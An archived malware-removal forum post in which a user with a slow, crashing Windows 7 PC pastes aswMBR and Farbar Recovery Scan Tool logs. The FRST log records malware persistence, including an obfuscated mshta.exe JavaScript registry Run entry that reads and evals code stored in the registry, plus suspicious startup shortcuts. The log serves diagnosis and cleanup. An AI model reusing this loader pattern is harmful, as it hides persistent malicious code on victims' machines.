This is a read-only archive. No new posts or registrations. Privacy Page
Spyware / Malware / Virus Removal

com has mind of its own [Solved]

26 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

Looking for the outcome? Ask AI

Hello,

 

 I have used your service before and have always been pleased. this is ann oldercomputer with issues.  It is is slow,  cursor spins alot, it frequently crashes, and is difficult to work with.  Is it able to be saved?   Please help   Here are the logs, 

 

 

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2019-07-17 09:02:33
—————————–
09:02:33.033    OS Version: Windows x64 6.1.7601 Service Pack 1
09:02:33.033    Number of processors: 4 586 0x3A09
09:02:33.034    ComputerName: RICHARD-PC  UserName: richard
09:02:34.786    Initialze error C000010E - driver not loaded
09:02:34.809    write error "aswCmnB.dll". The process cannot access the file because it is being used by another process.
09:05:12.368    AVAST engine defs: 17030301
09:05:17.761    Service scanning
09:05:49.515    Modules scanning
09:05:49.520    Disk 0 trace - called modules:
09:05:49.523    
09:05:51.390    AVAST engine scan C:\Windows
09:05:53.933    AVAST engine scan C:\Windows\system32
09:08:20.494    AVAST engine scan C:\Windows\system32\drivers
09:08:32.030    AVAST engine scan C:\Users\richard
09:09:20.109    The log file has been saved successfully to "C:\Users\richard\Desktop\aswMBR.txt"
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-07-2019 01
Ran by [removed] (administrator) on RICHARD-PC (17-07-2019 09:25:24)
Running from C:\Users\[removed]\Desktop
[removed]
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(DTS, Inc. -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Facebook, Inc. -> Facebook) C:\Users\richard\AppData\Local\Facebook\Games\FacebookGameroom.exe
(Fitbit, Inc. -> Fitbit, Inc.) [File not signed] C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel® Upgrade Service -> Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atiesrxx.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Ralink Technology Corporation -> Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry.exe
(Ralink Technology Corporation -> Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe
(Ralink Technology Corporation -> Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaUI.exe
(Webroot Inc. -> Webroot) C:\Program Files\Webroot\WRSA.exe
(Webroot Inc. -> Webroot) C:\Program Files\Webroot\WRSA.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\…\Run: [WRSVC] => C:\Program Files\Webroot\WRSA.exe [4584344 2019-07-17] (Webroot Inc. -> Webroot)
HKLM\…\Policies\Explorer: [NoViewOnDrive] 0
HKLM\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\…\Policies\Explorer: [NoViewContextMenu] 0
HKLM\…\Policies\Explorer: [NoShellSearchButton] 0
HKLM\…\Policies\Explorer: [NoFind] 0
HKLM\…\Policies\Explorer: [NoFile] 0
HKLM\…\Policies\Explorer: [HideClock] 0
HKLM\…\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\…\Policies\Explorer: [NoSetFolders] 0
HKLM\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\…\Policies\Explorer: [NoSetTaskbar] 0
HKLM\…\Policies\Explorer: [NoDeletePrinter] 0
HKLM\…\Policies\Explorer: [NoDFSTab] 0
HKLM\…\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\…\Policies\Explorer: [NoLogoff] 0
HKLM\…\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\…\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\…\Policies\Explorer: [NoResolveSearch] 0
HKLM\…\Policies\Explorer: [NoSaveSettings] 0
HKLM\…\Policies\Explorer: [NoHardwareTab] 0
HKLM\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\…\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-19\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-19\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-19\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-19\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-19\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-19\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-19\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-20\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-20\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-20\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-20\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-20\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-20\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-20\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8894680 2016-08-05] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Run: [*ayjqynct<*>] => "C:\Windows\system32\mshta.exe" javascript:Bpbhf5K="e";h90p=new%20ActiveXObject("WScript.Shell");Zoj5ctqp="pPw9FGI";BaPt42=h90p.RegRead("HKCU\\software\\lwtp\\lvheg");wTfJMwt6="U";eval(BaPt42);KZJf1m9 (the data entry has 10 more characters). <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Run: [*xfhb<*>] => "C:\Users\richard\AppData\Local\2b9a\f2dc.54bc6" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {0a44b838-5bea-11e4-990a-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {5f725559-8e23-11e2-a232-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {6646635f-85f7-11e3-b40f-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {74e0c3ad-1f94-11e5-8d4a-60a44c3dd8c8} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-441904776-594677368-125994074-1001\…\MountPoints2: {f2cd7dbd-84c1-11e2-b5c7-806e6f6e6963} - D:\MCF_MadameFate.exe
HKU\S-1-5-18\…\Policies\system: [DisableCMD] 0
HKU\S-1-5-18\…\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-18\…\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-18\…\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-18\…\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoFind] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoFile] 0
HKU\S-1-5-18\…\Policies\Explorer: [HideClock] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-18\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.142\Installer\chrmstp.exe [2019-07-17] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" –configure-user-settings –verbose-logging –system-level
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2019-05-02] (Adobe Inc. -> Adobe Systems, Inc.)
Lsa: [Notification Packages] scecli "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ralink Wireless Utility.lnk [2013-03-04]
ShortcutTarget: Ralink Wireless Utility.lnk -> C:\Program Files (x86)\Ralink\Common\RaUI.exe (Ralink Technology Corporation -> Ralink Technology, Corp.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Secunia PSI Tray.lnk [2016-08-27]
ShortcutTarget: Secunia PSI Tray.lnk -> C:\Program Files (x86)\Secunia\PSI\psi_tray.exe (No File)
Startup: C:\Users\richard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9a3a.lnk [2016-10-09]
ShortcutAndArgument: 9a3a.lnk -> C:\Windows\System32\cmd.exe => /C start "" "C:\Users\richard\AppData\Roaming\ed4b\c721.5fa43"
Startup: C:\Users\richard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dde6.lnk [2016-11-21]
ShortcutTarget: dde6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Windows -> Microsoft Corporation)
Startup: C:\Users\richard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2018-11-23]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\richard\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook, Inc. -> Facebook)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {034F7BE4-01E6-4669-A2EF-FA2AC0C9E23C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [6854360 2016-08-05] (Piriform Ltd -> Piriform Ltd)
Task: {204D31B9-4534-423F-88F8-0466AFC5D8F9} - System32\Tasks\GoogleUpdateTaskMachineCore1d1e91cd5856273 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {62E5C6B1-ACB5-4C1A-96E8-0F322FACE3DD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {85F719B8-C8CA-43C2-849D-905BBA4D32B0} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {882871F6-228A-4C1D-A564-00BDD16F6104} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {B364A280-0AB9-48E1-B7ED-06A42757557E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-06-21] (Adobe Inc. -> Adobe)
Task: {BDE7241D-F37A-4748-820E-C0D22FF79E38} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e91cd5f87143 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {D779E8F6-3857-4C64-9400-9436F7A4E174} - System32\Tasks\Games\UpdateCheck_S-1-5-21-441904776-594677368-125994074-1001 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2012-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {E6F7E74A-4FD9-413B-AC43-C8B52DE8BD76} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_207_Plugin.exe [1457208 2019-06-21] (Adobe Inc. -> Adobe)
Task: {FE7F83D2-5527-44B6-9775-DA7DCF6AEBFD} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{29DCBCA3-040D-4832-8D35-34BEB5274039}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{A183BB9B-B707-4E38-BC51-E5EA52B835BF}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-441904776-594677368-125994074-1001 -> DefaultScope {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKU\S-1-5-21-441904776-594677368-125994074-1001 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
BHO: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Common Files\Webroot\WebFiltering\wrflt.dll [2017-01-27] (Webroot Inc. -> Webroot)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files (x86)\Common Files\Webroot\WebFiltering\wrflt.dll [2017-01-27] (Webroot Inc. -> Webroot)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: qb6le4mq.default-1439605903410-1540077903902
FF ProfilePath: C:\Users\richard\AppData\Roaming\Mozilla\Firefox\Profiles\qb6le4mq.default-1439605903410-1540077903902 [2019-07-17]
FF HKLM\…\Firefox\Extensions: [[removed]] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer
FF Extension: (Webroot Filtering Extension) - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer [2017-01-27] [Legacy]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_207.dll [2019-06-21] (Adobe Inc. -> )
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_207.dll [2019-06-21] (Adobe Inc. -> )
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL [2011-04-20] (CANON INC.) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
